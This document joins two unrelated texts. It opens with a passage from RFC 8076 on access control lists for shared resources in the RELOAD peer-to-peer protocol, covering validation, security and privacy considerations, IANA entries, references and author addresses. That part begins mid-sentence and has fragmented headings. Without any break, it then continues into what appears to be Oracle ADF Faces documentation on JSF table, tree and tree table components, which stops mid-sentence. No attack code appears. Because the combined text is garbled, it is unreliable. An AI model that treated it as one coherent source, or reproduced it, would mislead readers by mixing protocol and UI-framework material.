the certificate that was used to sign the ACL item obtained in the previous step. - Validate that an item of the corresponding ACL contains a "to_user" field whose value equals the username obtained in step 3. Additionally, validate that the "ad" flag is set to 1. - Repeat steps 3 and 4 until the "to_user" value is equal to the username of the signer of the ACL in the selected item. This final ACL item is expected to be the root item of this ACL, which MUST be further validated by verifying that the root item was signed by the owner of the ACL Resource., can: - Send a Stat request to the Resource-ID of the Shared Resource to obtain all array indexes of stored ACL Kinds (as per [RFC6940], Section 7.4.3.). - document patterns. Hence, on an inbound store request on a Kind that uses the USER-CHAIN-ACL access policy, the following rules MUST be applied: In the USER-CHAIN-ACL policy, a given value MUST NOT be written or overwritten, if neither one of USER-MATCH or USER-NODE-MATCH (mandatory if the data model is dictionary) access policies of the base document [RFC6940] applies. Additionally, the store request MUST be denied if the signer's certificate does not contain a username that matches to the user and domain portion in one of the variable resource name patterns (cf. Section 5) specified in the configuration document or if the hashed Resource Name does not match the Resource-ID. The Resource Name of the Kind to be stored MUST be taken from the mandatory ResourceNameExtension field in the corresponding Kind data structure. If the access rights cannot be verified according to the ACL validation procedure described in Section 6.3, the store request MUST also be denied. Otherwise, the store request can be processed further. 7. ACCESS-CONTROL-LIST). 8. Security Considerations In this section, we discuss security issues that are relevant to the usage of Shared Resources in RELOAD [RFC6940].. Trust Delegation to a Malicious or Misbehaving Peer A Resource Owner that erroneously delegated write access to a Shared Resource for a misbehaving peer enables this malicious member of the overlay to interfere with the corresponding group application in several unwanted ways. Examples of destructive interferences range from exhausting shared storage to dedicated application-specific misuse. Additionally, a bogus peer that was granted delegation rights may authorize further malicious collaborators to writing the Shared Resource. It is the obligation of the Resource Owner to bind trust delegation to apparent trustworthiness. Additional measures to monitor proper behavior may be applied. In any case, the Resource Owner will be able to revoke the trust delegation of an entire tree in a single overwrite operation. It further holds the right to overwrite any malicious contributions to the shared resource under misuse. 8.4. Privacy Issues All data stored in the Shared Resource is readable by any node in the overlay; thus, applications requiring privacy need to encrypt the data. The ACL needs to be stored unencrypted; thus, the list members of a group using a Shared Resource will always be publicly visible. 9. IANA Considerations 9.1. Access Control Policy IANA has registered the following entry in the "RELOAD Access Control Policies" registry (cf. [RFC6940]) to represent the USER-CHAIN-ACL Access Control Policy, as described in Section 6.6. +-------------------+----------+ | Access Policy | RFC | +-------------------+----------+ | USER-CHAIN-ACL | RFC 8076 | +-------------------+----------+ 9.2. Data Kind-ID IANA has registered the following code point in the "RELOAD Data Kind-ID" registry (cf. [RFC6940]) to represent the ShaRe ACCESS- CONTROL-LIST kind, as described in Section 7. +----------------------+------------+----------+ | Kind | Kind-ID | RFC | +----------------------+------------+----------+ | ACCESS-CONTROL-LIST | 0x4 | RFC 8076 | +----------------------+------------+----------+ 9.3. XML Namespace Registration This document registers the following URI for the config XML namespace in the IETF XML registry defined in [RFC3688]. URI: urn:ietf:params:xml:ns:p2p:config-base:share Registrant Contact: The IESG XML: N/A, the requested URI is an XML namespace 10. References 10.1. Normative References [IEEE-Posix] - "IEEE Standard for Information Technology - Portable Operating System Interface (POSIX) - Part 2: Shell and Utilities (Vol. 1)", IEEE Std 1003.2-1992, ISBN 1-55937-255-9, DOI 10.1109/IEEESTD.1993.6880751, January 1993, <>. [OASIS.relax_ng] - Clark, J. and M. Murata, "RELAX NG Specification", December 2001. 6940] Jennings, C., Lowekamp, B., Ed., Rescorla, E., Baset, S., and H. Schulzrinne, "REsource LOcation And Discovery (RELOAD) Base Protocol", RFC 6940, DOI 10.17487/RFC6940, January 2014, <>. [W3C.REC-xmlschema-2-20041028] - Malhotra, A. and P. Biron, "XML Schema Part 2: Datatypes Second Edition", World Wide Web Consortium Recommendation REC-xmlschema-2-20041028, October 2004, <>. 10.2. Informative References 7904] Jennings, C., Lowekamp, B., Rescorla, E., Baset, S., Schulzrinne, H., and T. Schmidt, Ed., "A SIP Usage for REsource LOcation And Discovery (RELOAD)", RFC 7904, DOI 10.17487/RFC7904, October 2016, <>. Acknowledgments This work was stimulated by fruitful discussions in the P2PSIP working group and the SAM research group. We would like to thank all active members for their constructive thoughts and feedback. In particular, the authors would like to thank (in alphabetical order) Emmanuel Baccelli, Ben Campbell, Alissa Cooper, Lothar Grimm, Russ Housley, Cullen Jennings, Matt Miller, Peter Musgrave, Joerg Ott, Marc Petit-Huguenin, Peter Pogrzeba, and Jan Seedorf. This work was partly funded by the German Federal Ministry of Education and Research, projects HAMcast, Mindstone, and SAFEST. Authors' Addresses Alexander Knauf HAW Hamburg Berliner Tor 7 Hamburg D-20099 Germany Phone: +4940428758067 Email: alexanderknauf@gmail.com Thomas C. Schmidt HAW Hamburg Berliner Tor 7 Hamburg D-20099 Germany Email: t.schmidt@haw-hamburg.de URI: Gabriel Hege daviko GmbH Schillerstr. 107 Berlin D-10625 Germany Phone: +493043004344 Email: hege@daviko.com Matthias Waehlisch link-lab & FU Berlin Hoenower Str. 35 Berlin D-10318 Germany Email: mw@link-lab.net URI:
https://pike.lysator.liu.se/docs/ietf/rfc/80/rfc8076.xml
CC-MAIN-2022-33
refinedweb
2,434
56.05
list.clear() outside of <List> finalList = new ArrayList(); will delete element in finalList?KonradZuse Sep 22, 2013 7:58 PM Hello all! I am using 3 ArrayLists. the first is List<String> the second is List<String[]> and the third is a list of those lists List<List> I use the first list to get the string I need, but I use the second for String.split. I then need to keep a list of these to use, so I need the third List. After adding the second list to the list of lists I want to clear it so I can set up the next list to be added, but if I do list.clear(); it will delete everything in that list. If I do not clear it, it is fine. At first I wasn't sure if it was my fault, because I'm not sure if I ever had to do that before, so I made a test case that yields the result if I change the element outside. /* * To change this template, choose Tools | Templates * and open the template in the editor. */ package javaapplication1; import java.sql.SQLException; import java.util.ArrayList; import java.util.List; /** * * @author Konrad */ public class JavaApplication1 { /** * @param args the command line arguments */ String a; List<String> j = new ArrayList<>(); public JavaApplication1() { a(); } public void a() { a = "ADASDSADSA"; j.add(a); a = null; System.out.println(j); } public static void main(String[] args) throws SQLException { JavaApplication1 a = new JavaApplication1(); } } If I change a = null to a = ""; it still yields the original a = "ADASD......"; protected List<String> list = new ArrayList<>(); protected List<String[]> list2 = new ArrayList<>(); protected List<List> finalList = new ArrayList<>(); ........ finalList.add(list2); //list2.clear(); With this I yield an empty array element, even though my array elements exist. I tried using multiple lists and I just had multiple empty elements. So again I'm not sure if I did something wrong, or is this a bug? Since my test case worked, I'm confused. Thanks! ~KZ 1. Re: list.clear() outside of <List> finalList = new ArrayList(); will delete element in finalList?KonradZuse Sep 22, 2013 9:30 PM (in response to KonradZuse) I ended up trying a bunch of things, but then realized that I could do List<String[]> list3 = new ArrayList<>(list2); and create a clone of it. I tried clone, but apparently that method doesn't exist within the (List??ArrayList??). I understand that deleting the object will mess up anything referencing it, but I figured once something was added as an element of a list, it would stay there, as shown in the above. I guess Lists might be different, weird... Glad it works now. 2. Re: list.clear() outside of <List> finalList = new ArrayList(); will delete element in finalList?rp0428 Sep 22, 2013 9:57 PM (in response to KonradZuse) After adding the second list to the list of lists I want to clear it so I can set up the next list to be added, but if I do list.clear(); it will delete everything in that list. Correct - you are just working with multiple references to the SAME set of objects. Use 'remove' to remove an element from a list and then 'add' to add it to the other list. See the Javadocs for the 'remove' method of the List interface remove E remove(int index) - Removes the element at the specified position in this list (optional operation). Shifts any subsequent elements to the left (subtracts one from their indices). Returns the element that was removed from the list. - Parameters: index- the index of the element to be removed - Returns: - the element previously at the specified position - Throws: UnsupportedOperationException- if the remove operation is not supported by this list IndexOutOfBoundsException- if the index is out of range (index < 0 || index >= size())
https://community.oracle.com/message/11199797
CC-MAIN-2017-34
refinedweb
637
71.65
One of the key aspects of any successful form is clarity. If the user finds the form easy to use and easy to understand, they are more likely to fill it in, and submit it. In this chapter, we are going to be looking at input masking. You will learn how to quickly and easily apply masks to your form inputs, and to configure them to your needs with real-life examples, such as telephone numbers. This is an extract taken from Building Forms with Vue.js written by Marina Mosti (@MarinaMosti.) To access the code that forms the basis of the projects found throughout the book, click here. Marina is speaking at VueConf in Toronto in November. Learn more here. What exactly are input masks? They are predefined structures that display the data for an input. For example, if you were going to mask a telephone input, you’d probably want it to display as (123) 234–5555, instead of simply, 1232345555. You can clearly see that the first example is not only easier to read, but it also conveys meaning about what the field is trying to accomplish. Input masks are a nice feature to take your UX to another level, and they are very easy to implement, thanks to open source libraries such as v-mask. The GitHub repository page can be found here. How to install the v-mask library Let’s get started with the installation of the v-mask library. In order for our project to use what it has to offer, we first need to add it to our project dependencies. Follow these steps in order to do this: 1. Open up your Terminal, and type in the following command to add the library to our dependencies: > npm install v-mask 2. We need to add it to Vue as a plugin, so head to main.js, and let’s both import it, and let Vue know that we want to register it as a plugin for all of our apps. Add the following code, after the import App line: import VueMask from ‘v-mask’ Vue.use(VueMask); Now that we have registered our plugin, we have access to a new directive: v-mask. We can add this new directive directly onto our <input> elements, and the library will handle the masking behind the scenes by reading the users’ input, and adjusting the display of the field. Let’s try this on a regular input first, then we will add some props to our project’s component. 3. Go to App.vue, and create a new <input> element after the email input: <input type=”text” /> If we were to type in a phone number in this field as it is, we would get the default input behavior. Anything goes. So, let’s apply a telephone number mask to it. Our new v-mask library has a requirement that every field that we apply it to needs to be v-modeled, so let’s get that done first. 4. Add a new telephone prop to our data() inside of the form object: form: { … telephone: ‘’ }, 5. Now, go back to our new <input> element, and apply v-model. We are also going to now add the v-mask directive, shown as follows: <input type=”text” v-model=”form.telephone” v-mask=”’(###)###-####’” > Go back to your browser, and try the input once again. As you type, you will see that you are actually getting it nicely formatted to what we would expect for a telephone number. In five simple steps, we have added input masking to one of our form fields. Now let’s take a look in more depth at what the v-mask directive does. What is a directive? When we added the v-mask library to our project, and added the plugin within main.js, the library created a new directive for us, v-mask. What exactly is a directive, though? We know it looks like an HTML attribute, but what else? Directives are special attributes with the v- prefix. Directive attribute values are expected to be a single JavaScript expression (with the exception of v-for […]). A directive’s job is to reactively apply side effects to the DOM, when the value of its expression changes. Official Vue docs. Okay, so it looks like we have a special attribute that can modify the element. That sounds exactly like what we saw happen, when we applied to the input element. But, how does the actual expression or value that we are putting into this directive work? We know from the example that we are passing in a string, and you can see that inside the double quotes that make up the v-mask=”” attribute, we are setting a new pair of single quotes (‘). This means that the expression inside this attribute is JavaScript, and that we are passing it a string value. From looking at the v-mask library documentation, we know that we have a few special placeholder characters that we can use inside our masks. The table for those is as follows: Take for example, a mask that will display the time of the day. You could define it as follows: v-mask=”’##:##’” This means that this input will take two numbers from 0 to 9 (##), followed by a : character, followed by another two numbers (##). Anything that does not match this pattern, will be ignored by the input. v-mask is a very powerful library that allows us to customize exactly how we want our input to be displayed, by combining these simple rules. In the final section of this post, we’ll look at how to modify custom inputs. This will allow us to fully leverage the power of the input masks. How to enhance custom inputs We have put in a lot of work to create our awesome custom BaseInput, so we definitely want to keep using it! Follow these steps in order to modify the BaseInput, and to allow for input masking: 1. Go back to App.vue, and switch the <input> element for a <BaseInput> component: <BaseInput label=”Telephone” type=”text” v-model=”form.telephone” /> Let’s go into BaseInput.vue now, and create a new prop; we will call it mask, and it will default to an empty string. It is important that we default it to an empty string, or else the directive will try to match, and we won’t be able to type into the fields if they don’t have a declared mask! 2. Add it to your props object: …, mask: { type: String, required: false } 3. Now, go back to App.vue, and update our telephone BaseInput to use the mask attribute: <BaseInput label=”Telephone” type=”text” v-model=”form.telephone” :mask=”’(###)###-####’” /> All done! Return to your browser, and add some numbers to the field, and you should have a nice-looking telephone mask working with your custom component!
https://medium.com/javascript-in-plain-english/how-to-use-v-masks-when-building-forms-with-vue-js-d623d08216c3?source=post_page-----d623d08216c3----------------------
CC-MAIN-2019-47
refinedweb
1,157
72.26
Serial Number Generator How to generate a series of positive integers?Howdy folks, I'm writing soatest-cases for a set-of-webservices which implement a "logical conversation". I need to pass a unique conversationId (as a soap-header parameter) with each service request. At the moment I'm just choosing a random number between 1 and 10,000,000 for each scenario... but (now I'm upto over a hundred scenarios) finding & resolving the inevitable collisions is getting UGLY! Please could anyone advise on How might I go about writing a serial number generator? I'm thinking of a python (or java) method which returns 1 the first time it is called, 2 the second time, 3 the third, and so on upto (2^31)-1... within an execution of my test-suit. Alternately, maybe the number of milliseconds since midnight (0..86,400,000) might be simpler? and do the trick just as well? Concurrency/contention is NOT an issue I think as the test-cases will allways be run synchronously, and by a single user at any one time. I was thinking I'd save my serial-number in a soatest-variable, and then use it's value in the parameterised soap-header-parameter of each request within a scenario. Where/how could I call the serial-number-generator script at the start of each scenario? Is there a scenario-init method I can hijack, or would I need to manually retrofit every scenario with an initialisation-test-case. I would appreciate any pointers in right direction. I shall undertake some heavy googling in meantime. Cheers all, Keith. 0 I recently had to create a Jython script which generated a two or three char key. (I probably hvae a post out here somewhere asking for help as well!) I retrofitted it to generate a random 10 character key comprised of letters and numbers. So far, it has generated U1AS2CQXKA, 515S7VL5RE, and R13QWEYPS1. I have no idea what the chances are that it would generate the same key twice, but I'd bet it's pretty slim. I have attached it for you. Here are the bits you'll need to know when using it: * It is Jython code. * If you want to add lower case letters, add them to the line -> chars = String("ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789") * For each char you add, you'll need to increase the line -> i = int(Math.floor(Math.random() * 36)) by 1 so that the search through the string goes all the way to the end. * To see it work, just run the "Test 1" step and check the return in the "Return Value->XML Data Bank (see the Literal tab)". I'll keep working with it, but for now it just generates a single key. We might be able to change it to generate more keys, then you could do this: Generate 100 keys Drop them into XML Data bank Be accessed later in your test suite Enjoy! BrianH I just need integers, but your idea of a datasource got me thinking... What I'm going to try is a java class which is-a datasource... It'll just create-or-rename a directory ./MySoaTestFilename.serialNumber.1 (for persistence) and return the next number ... Sounds easy enough. I really appreciate you volunteering your thoughts. iouBeer++ Cheers. Keith. I reckon I'll just use System.currentTimeMillis() % 1,000,000,000 which is int-safe and surely must be distinct enough (1,000,000,000 / (1,000 * 60 * 60 * 24) = 11.5740741). I hadn't realised that SoaTests-Python is actually Jython. Cool as!!! Thank you. Cheers, Keith. Method: generateConversationId from soaptest.api import * # Required for SOAPUtil from java.lang import * # Required for System, String, Math, etc, def generateConversationId(context): return SOAPUtil.getXMLFromString([str(System.currentTimeMillis() % (1000*1000*1000))]) --> XML Data Bank (just rename the default z0 to conversationId) --> Works like a charm --> Thank you gentlemen... It's been fun.
https://forums.parasoft.com/discussion/comment/5150/
CC-MAIN-2018-34
refinedweb
655
66.44
This chapter describes how to display tables and trees using the ADF Faces table, tree and treeTable components. If your application uses the Fusion technology stack, then you can use data controls to create tables and trees. For more information see the "Creating ADF Databound Tables" and "Displaying Master-Detail Data" chapters of the Oracle Fusion Middleware Fusion Developer's Guide for Oracle Application Development Framework This chapter includes the following sections: Section 10.1, "Introduction to Tables, Trees, and Tree Tables" Section 10.2, "Displaying Data in Tables" Section 10.3, "Adding Hidden Capabilities to a Table" Section 10.4, "Enabling Filtering in Tables" Section 10.5, "Displaying Data in Trees" Section 10.6, "Displaying Data in Tree Tables" Section 10.7, "Passing a Row as a Value" Section 10.8, "Displaying Table Menus, Toolbars, and Status Bars" Section 10.9, "Exporting Data from Table, Tree, or Tree Table" Section 10.10, "Accessing Selected Values on the Client from Components That Use Stamping" Structured data can be displayed as tables consisting of rows and columns using the ADF Faces table component. Hierarchical data can be displayed either as tree structures using ADF Faces tree component, or in a table format, using ADF Faces tree table component. Instead of containing a child component for each record to be displayed, and then binding these components to the individual records, table, tree and tree table components are bound to a complete collection, and they then repeatedly render one component (for example an outputText component) by stamping the value for each record. For example, say a table contains two child column components. Each column displays a single attribute value for the row using an output component and there are four records to be displayed. Instead of binding four sets of two output components to display the data, the table itself is bound to the collection of all four records and simply stamps one set of the output components four times. As each row is stamped, the data for the current row is copied into the var attribute on the table, from which the output component can retrieve the correct values for the row. For more information about how stamping works, especially with client components, see Section 10.1.5, "Accessing Client Table, Tree, and Tree Table Components." Example 10-1 shows the JSF code for a table whose value for the var attribute is row. Each outputText component in a column displays the data for the row because its value is bound to a specific property on the variable. Example 10-1 JSF Code for a Table Uses the var Attribute to Access Values <af:table <af:column> <af:outputText </af:column> <af:column> af:outputText </af:column> </af:table> The table component displays simple tabular data. Each row in the table displays one object in a collection, for example one row in a database. The column component displays the value of attributes for each of the objects. For example, as shown in Figure 10-1, the Table tab in the File Explorer application uses a table to display the contents of the selected directory. The table value attribute is bound to the contentTable property of the tableContentView managed bean in the File Explorer demo. The table component provides a range of features for end users, such as sorting columns, and selecting one or more rows and then executing an application defined action on the selected rows. It also provides a range of presentation features, such as showing grid lines and banding, row and column headers, column headers spanning groups of columns, and values wrapping within cells. Hierarchical data (that is data that has parent/child relationships), such as the directory in the File Explorer application, can be displayed as expandable trees using the tree component. Items are displayed as nodes that mirror the parent/child structure of the data. Each top-level node can be expanded to display any child nodes, which in turn can also be expanded to display any of their child nodes. Each expanded node can then be collapsed to hide child nodes. Figure 10-2 shows the file directory in the File Explorer application, which is displayed using a tree component. Hierarchical data can also be displayed using tree table components. The tree table also displays parent/child nodes that are expandable and collapsible, but in a tabular format, which allows the page to display attribute values for the nodes as columns of data. For example, along with displaying a directory's contents using a table component, the File Explorer application has another tab that uses the tree table component to display the contents, as shown in Figure 10-3. Like the tree component, the tree table component can show the parent/child relationship between items. And like the table component, the tree table component can also show any attribute values for those items in a column. Most of the features available on a table component are also available in tree table component. You can add a toolbar and a status bar to tables, trees, and tree tables by surrounding them with the panelCollection component. The top panel contains a standard menu bar as well as a toolbar that holds menu-type components such as menus and menu options, toolbars and toolbar buttons, and status bars. Some buttons and menus are added by default. For example, when you surround a table, tree, or tree table with a panelCollection component, a toolbar that contains the View menu is added. This menu contains menu items that are specific to the table, tree, or tree table component. Figure 10-4 shows the tree table from the File Explorer application with the toolbar, menus, and toolbar buttons created using the panelCollection component. The table, tree, and tree table components are virtualized, meaning not all the rows that are there for the component on the server are delivered to and displayed on the client. You configure tables, trees, and tree tables to fetch a certain number of rows at a time from your data source. The data can be delivered to the components immediately upon rendering, when it is available, or lazily fetched after the shell of the component has been rendered (by default, the components fetch data when it is available). With immediate delivery, the data is fetched during the initial request. With lazy delivery, when a page contains one or more table or tree components, the page initially goes through the standard lifecycle. However, instead of fetching the data during that initial request, a special separate partial page rendering (PPR) request is run, and the number of rows set as the value of the fetch size for the table is then returned. Because the page has just been rendered, only the Render Response phase executes for the components, allowing the corresponding data to be fetched and displayed. When a user's actions cause a subsequent data fetch (for example scrolling in a table for another set of rows), another PPR request is executed. When content delivery is configured to be delivered when it is available, the framework checks for data availability during the initial request, and if it is available, it sends the data to the table. table, tree, or tree table. Doing so allows the initial page layout and other components to be rendered first before the data is available. Immediate delivery should be used if the table, tree, or tree table however that only the number of rows configured to be the fetch block will be initially returned. As with lazy delivery, when a user's actions cause a subsequent data fetch, the next set of rows are delivered. When available delivery provides the additional flexibility of using immediate when data is available during initial rendering or falling back on lazy when data is not initially available. The number of rows that are displayed on the client are just enough to fill the page as it is displayed in the browser. More rows are fetched as the user scrolls the component vertically. The fetchSize attribute determines the number of rows requested from the client to the server on each attempt to fill the component. The default value is 25. So if the height of the table is small, the fetch size of 25 is sufficient to fill the component. However, if the height of the component is large, there might be multiple requests for the data from the server. Therefore, the fetchSize attribute should be set to a higher number. For example, if the height of the table is 600 pixels and the height of each row is 18 pixels, you will need at least 45 rows to fill the table. With a fetchSize of 25, the table has to execute two requests to the server to fill the table. For this example, you would set the fetch size to 50. However, if you set the fetch size too high, it will impact both server and client. The server will fetch more rows from the data source than needed and this will increase time and memory usage. On the client side, it will take longer to process those rows and attach them to the component. You can also configure the set of data that will be initially displayed using the displayRow attribute. By default, the first record in the data source is displayed in the top row or node and the subsequent records are displayed in the following rows or nodes. You can also configure the component to first display the last record in the source instead. In this case, the last record is displayed in the bottom row or node of the component, and the user can scroll up to view the preceding records. Additionally, you can configure the component to display the selected row. This can be useful if the user is navigating to the table, and based on some parameter, a particular row will be programmatically selected. When configured to display the selected row, that row will be displayed at the top of the table and the user can scroll up or down to view other rows. You can configure selection to be either for no rows, for a single row, or for multiple rows of tables, trees, and tree tables using the rowSelection attribute. This setting allows you to execute logic against the selected rows. For example, you may want users to be able to select a row in a table or a node in a tree, and then to click a command button that navigates to another page where the data for the selected row is displayed and the user can edit it. When the selected row (or node) of a table, tree, or tree table changes, the component triggers a selection event. This event reports which rows were just deselected and which rows were just selected. While the components handle selection declaratively, if you want to perform some logic on the selected rows, you need to implement code that can access those rows and then perform the logic. You can do this in a selection listener method on a managed bean. For more information, see Section 10.2.8, "What You May Need to Know About Performing an Action on Selected Rows in Tables." Note:If you configure your component to allow multiple selection, users can select one row and then press the shift key to select another row, and all the rows in between will be selected. This selection will be retained even if the selection is across multiple data fetch blocks. Similarly, you can use the Ctrl key to select rows that are not next to each other. For example, if you configure your table to fetch only 25 rows at a time, but the user selects 100 rows, the framework is able to keep track of the selection. You can choose the component used to display the actual data in a table, tree, or tree table. For example, you may want the data to be read-only, and therefore you might use an outputText component to display the data. Conversely, if you want the data to be able to be edited, you might use an inputText component, or if choosing from a list, one of the SelectOne components. All of these components are placed as children to the column component (in the case of a table and tree table) or within the nodeStamp facet (for a tree). When you decide to use components whose value can be edited to display your data, you have the option of having the table, tree, or tree table either display all rows as available for editing at once, or display all but the currently active row as read-only using the editingMode attribute. For example, Figure 10-5 shows a table whose rows can all be edited. The page renders using the components that were added to the page (for example, inputText, inputDate, and inputComboBoxListOfValues components). Figure 10-6 shows the same table (that is, it uses inputText, inputDate, and inputComboBoxListOfValues components to display the data), but configured so that only the active row displays the editable components. Users can then click on another row to make it editable (only one row is editable at a time). Note that outputText components are used to display the data in the noneditable rows, even though the same input components as in Figure 10-5 were used to build the page. The only row that actually renders those components is the active row. The currently active row is determined by the activeRowKey attribute on the table. By default, the value of this attribute is the first visible row of the table. When the table (or tree or tree table) is refreshed, that component scrolls to bring the active row into view, if it is not already visible. When the user clicks on a row to edit its contents, that row becomes the active row. When you allow only a single row (or node) to be edited, the table (or tree or tree table) performs PPR when the user moves from one row (or node) to the next, thereby submitting the data (and validating that data) one row at a time. When you allow all rows to be edited, data is submitted whenever there is an event that causes PPR to typically occur, for example scrolling beyond the currently displayed rows or nodes. Note:You should not use more than one editable component in a column. Not all editable components make sense to be displayed in a click-to-edit mode. For example, those that display multiple lines of HTML input elements may not be good candidates. These components include: SelectManyCheckbox SelectManyListBox SelectOneListBox OneRadio SelectManyShuttle Performance Tip:For increased performance during both rendering and postback, you should configure your table to allow editing only to a single row. When you elect to allow only a single row to be edited at a time, the page will be displayed more quickly, as output components tend to generate less HTML than input components. Additionally, client components are not created for the read-only rows. Because the table (or tree, or tree table) performs PPR as the user moves from one row to the next, only that row's data is submitted, resulting in better performance than a table that allows all cells to be edited, which submits all the data for all the rows in the table at the same time. Allowing only a singe row to be edited also provides more intuitive validation, because only a single row's data is submitted for validation, and therefore only errors for that row are displayed. You can configure your table, tree, or tree table so that popup dialogs will be displayed based on a user's actions. For example, you can configure a popup dialog to display some data from the selected row when the user hovers the mouse over a cell or node. You can also create popup context menus for when a user right-clicks a row in a table or tree table, or a node in a tree. Additionally, for tables and tree tables, you can create a context menu for when a user right-clicks anywhere within the table, but not on a specific row. Tables, trees, and tree tables all contain the contextMenu facet. You place your popup context menu within this facet, and the associated menu will be displayed when the user right-clicks a row. When the context menu is being fetched on the server, the components automatically establish the currency to the row for which the context menu is being displayed. Establishing currency means that the current row in the model for the table now points to the row for which the context menu is being displayed. In order for this to happen, the popup component containing the menu must have its contentDelivery attribute set to lazyUncached so that the menu is fetched every time it is displayed. Tip:If you want the context menu to dynamically display content based on the selected row, set the popup content delivery to lazyUncachedand add a setPropertyListenertag to a method on a managed bean that can get the current row and then display data based on the current row: <af:tree <af:popup <af:setPropertyListener <af:menu> <af:menu <af:commandMenuItem <af:commandMenuItem <af:commandMenuItem </af:menu> </af:menu> </af:popup> </f:facet> ... </af:tree> The code on the backing bean might look something like this: public class DynamicContextMenuTableBean { ... public void setCurrentTreeRowData(Map currentTreeRowData) { _currentTreeRowData = currentTreeRowData; } public Map getCurrentTreeRowData() { return _currentTreeRowData; } private Map _currentTreeRowData; } Tables and tree tables contain the bodyContextMenu facet. You can add a popup that contains a menu to this facet, and it will be displayed whenever a user clicks on the table, but not within a specific row. For more information about creating context menus, see Section 13.2, "Declaratively Creating Popup Elements." With ADF Faces, the contents of the table, tree, or tree table are rendered on the server. There may be cases when the client needs to access that content on the server, including: Client-side application logic may need to read the row-specific component state. For example, in response to row selection changes, the application may want to update the disabled or visible state of other components in the page (usually menu items or toolbar buttons). This logic may be dependent on row-specific metadata sent to the client using a stamped inputHidden component. In order to enable this, the application must be able to retrieve row-specific attribute values from stamped components. Client-side application logic may need to modify row-specific component state. For example, clicking a stamped command link in a table row may update the state of other components in the same row. The peer may need access to a component instance to implement event handling behavior (for more information about peers, see Section 3.1, "Introduction to Using ADF Faces Architecture"). For example, in order to deliver a client-side action event in response to a mouse click, the AdfDhtmlCommandLinkPeer class needs a reference to the component instance which will serve as the event source. The component also holds on to relevant state, including client listeners as well as attributes that control event delivery behavior, such as disabled or partialSubmit. Because there is no client-side support for EL in the rich client framework (RCF), nor is there support for sending entire table models to the client, the client-side code cannot rely on component stamping to access the value. Instead of reusing the same component instance on each row, a new JavaScript client component is created on each row (assuming any component must be created at all for any of the rows). Therefore, to access row-specific data on the client, you need to use the stamped component itself to access the value. To do this without a client-side data model, you use a client-side selection change listener. For detailed instructions, see Section 10.10, "Accessing Selected Values on the Client from Components That Use Stamping." By default, when tables, trees, and tree tables are placed in a component that stretches its children (for example, a panelCollection component inside a panelStretchLayout component), the table, tree, or tree table will stretch to fill the existing space. However, in order for the columns to stretch to fit the table, you must specify a specific column to stretch to fill up any unused space, using the columnStretching attribute. Otherwise, the table will only stretch vertically to fit as many rows as possible. It will not stretch the columns, as shown in Figure 10-7. When placed in a component that does not stretch its children (for example, in a panelCollection component inside a panelGroupLayout component set to vertical), by default, a table width is set to 300px, as shown in Figure 10-8. When you place a table in a component that does not stretch its children, you can control the height of the table so that is never more than a specified number of rows, using the autoHeightRows attribute. When you set this attribute to a positive integer, the table height will be determined by the number of rows set. If that number is higher than the fetchSize attribute, then only the number of rows in the fetchSize attribute will be returned. You can set autoHeightRows to -1 (the default), to turn off auto-sizing. Auto-sizing can be helpful in cases where you want to use the same table both in components that stretch their children and those that don't. For example, say you have a table that has 6 columns and can potentially display 12 rows. When you use it in a component that stretches its children, you want the table to stretch to fill the available space. If you want to use that table in a component that doesn't stretch its children, you want to be able to "fix" the height of the table. However, if you set a height on the table, then that table will not stretch when placed in the other component. To solve this issue, you can set the autoHeightRows attribute, which will be ignored when in a component that stretches, and will be honored in one that does not. The table component uses a Collection Model. You may also use other model classes, such as java.util.List, array, and javax.faces.model.DataModel. If you use one of these other classes, the table component automatically converts the instance into a CollectionModel class, but without the additional functionality. For more information about the CollectionModel class, see the MyFaces Trinidad Javadoc at. Note:If your application uses the Fusion technology stack, then you can use data controls to create tables and the collection model will be created for you. For more information see the "Creating ADF Databound Tables" chapter of the Oracle Fusion Middleware Web User Interface Developer's Guide for Oracle Application Development Framework. The immediate children of a table component must be column components. Each visible column component is displayed as a separate column in the table. Column components contain components used to display content, images, or provide further functionality. For more information about the features available with the column component, see Section 10.2.1, "Columns and Column Data.". Because of this stamping behavior, some components may not work inside the column. Most components will work without problems, for example any input and output components. If you need to use multiple components inside a cell, you can wrap them inside a panelGroupLayout component. Components that themselves support stamping are not supported, such as tables within a table. For information about using components whose values are determined dynamically at runtime, see Section 10.2.9, "What You May Need to Know About Dynamically Determining Values for Selection Components in Tables." You can use the detailStamp facet in a table to include data that can be optionally displayed or hidden. When you add a component to this facet, the table displays an additional column with an expand and collapse icon for each row. When the user clicks the icon to expand, the component added to the facet is displayed, as shown in Figure 10-9. When the user clicks on the expanded icon to collapse it, the component is hidden, as shown in Figure 10-10. For more information about using the detailStamp facet, see Section 10.3, "Adding Hidden Capabilities to a Table." Columns contain the components used to display the data. As stated previously, only one child component is needed for each item to be displayed; the values are stamped as the table renders. Columns can be sorted and can also contain a filtering element. Users can enter a value into the filter and the returned data set will match the value entered in the filter. You can set the filter to be either case-sensitive or case-insensitive. If the table is configured to allow it, users can also reorder columns. Columns have both header and footer facets. The header facet can be used instead of using the header text attribute of the column, allowing you to use a component that can be styled. The footer facet is displayed at the bottom of the column. For example, Figure 10-11 uses footer facets to display the total at the bottom of two columns. If the number of rows returned is more than can be displayed, the footer facet is still displayed; the user can scroll to the bottom row. A table component offers many formatting and visual aids to the user. You can enable these features and specify how they can be displayed. These features include: Row selection: By default, at runtime, users cannot select rows. If you want users to be able to select rows in order to perform some action on them somewhere else on the page, or on another page, then enable row selection for the table by setting the rowSelection attribute. You can configure the table to allow either a single row or multiple rows to be selected. For information about how to then programatically perform some action on the selected rows, see Section 10.2.8, "What You May Need to Know About Performing an Action on Selected Rows in Tables." Table height: You can set the table height to be absolute (for example, 300 pixels), or you can determine the height of the table based on the number of rows you wish to display at a time by setting the autoHeightRows attribute. For more information, see Section 10.1.6, "Geometry Management and Table, Tree, and Tree Table Components." Note:When table is placed in a layout-managing container, such as a panelSplittercomponent, it will be sized by the container and the autoHeightRowsis not honored. Grid lines: By default, an ADF table component draws both horizontal and vertical grid lines. These may be independently turned off using the horizontalGridVisible and verticalGridVisible attributes. Banding: Groups of rows or columns are displayed with alternating background colors using the columnBandingInterval attribute. This helps to differentiate between adjacent groups of rows or columns. By default, banding is turned off. Column groups: Columns in a table can be grouped into column groups, by nesting column components. Each group can have its own column group heading, linking all the columns together. Editable cells: When you elect to use input text components to display data in a table, you can configure the table so that all cells can be edited, or so that the user must explicitly click in the cell in order to edit it. For more information, see Section 10.1.3, "Editing Data in Tables, Trees, and Tree Tables." Performance Tip:When you choose to have cells be available for editing only when the user clicks on them, the table will initially load faster. This may be 